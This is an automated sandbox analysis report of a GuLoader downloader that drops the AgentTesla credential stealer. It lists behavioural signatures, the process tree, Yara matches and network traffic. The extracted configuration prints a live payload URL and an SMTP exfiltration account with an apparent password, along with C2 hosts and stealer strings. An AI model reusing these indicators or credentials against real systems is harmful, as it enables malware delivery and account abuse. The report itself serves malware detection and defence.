Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

Overview

General Information

Sample Name:SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
Analysis ID:635379
MD5:e2e4196b84fdf8956baa7f99b11812af
SHA1:7af0382928364f2fc088d13f96394f4d83bd01ae
SHA256:7004d20bac532e4a93f138bae6da90223d850992fd1c88ba176bc9349b802c6a
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe (PID: 7720 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe" MD5: E2E4196B84FDF8956BAA7F99B11812AF)
    • CasPol.exe (PID: 8356 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 4512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "fugen.ozkunt@paralikgroup.comFug1966Ozkmail.paralikgroup.comsaleseuropower2@yandex.com"}

Threatname: GuLoader

{"Payload URL": "http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.37821177352.0000000003251000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
        • 0x31238:$s10: logins
        • 0x41758:$s11: credential
        • 0x1e4a:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time
        • 0x2995:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401
        • 0x1f6b:$m5: \WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera
        00000003.00000000.37160550415.0000000000B10000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Click to see the 3 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000001.00000002.37821177352.0000000003251000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin"}
          Source: conhost.exe.4512.4.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "fugen.ozkunt@paralikgroup.comFug1966Ozkmail.paralikgroup.comsaleseuropower2@yandex.com"}
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeVirustotal: Detection: 21%Perma Link
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
          Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb00 source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0040290B FindFirstFileW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,

          Networking

          barindex
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin
          Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: global trafficHTTP traffic detected: GET /paralikgroup%20ori%204_vJdEAWVzP17.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: artist151sh.comCache-Control: no-cache
          Source: global trafficTCP traffic: 192.168.11.20:49777 -> 173.254.28.216:587
          Source: global trafficTCP traffic: 192.168.11.20:49777 -> 173.254.28.216:587
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: CasPol.exe, 00000003.00000002.42077179200.000000001D152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
          Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
          Source: CasPol.exe, 00000003.00000002.42052443379.0000000000E9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ckatRU.com
          Source: user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#Attribution
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#DerivativeWorks
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#Distribution
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#Notice
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#Reproduction
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#ShareAlike
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: CasPol.exe, 00000003.00000002.42078363194.000000001D233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.paralikgroup.com
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, Toelike.exe.3.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://ocsp.digicert.com0O
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: CasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42078363194.000000001D233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://8tHZzAc0TjNm.org
          Source: CasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://8tHZzAc0TjNm.orgt-Wl
          Source: CasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://8tHZzAc0TjNm.orgx
          Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42077179200.000000001D152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
          Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
          Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
          Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
          Source: CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
          Source: unknownDNS traffic detected: queries for: artist151sh.com
          Source: global trafficHTTP traffic detected: GET /paralikgroup%20ori%204_vJdEAWVzP17.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: artist151sh.comCache-Control: no-cache
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_00406D5F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_713D1BFF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325E349
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325CC31
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258525
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258720
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03251707
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03251706
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325671C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258F60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325657D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325657F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03255340
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325174E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03251950
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258550
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03252D5D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325EF5D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_032517AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03256780
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325878F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_032603E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_032553F6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_032585FB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258FC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03251827
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325DE21
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03251A05
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03255004
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03255214
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325501C
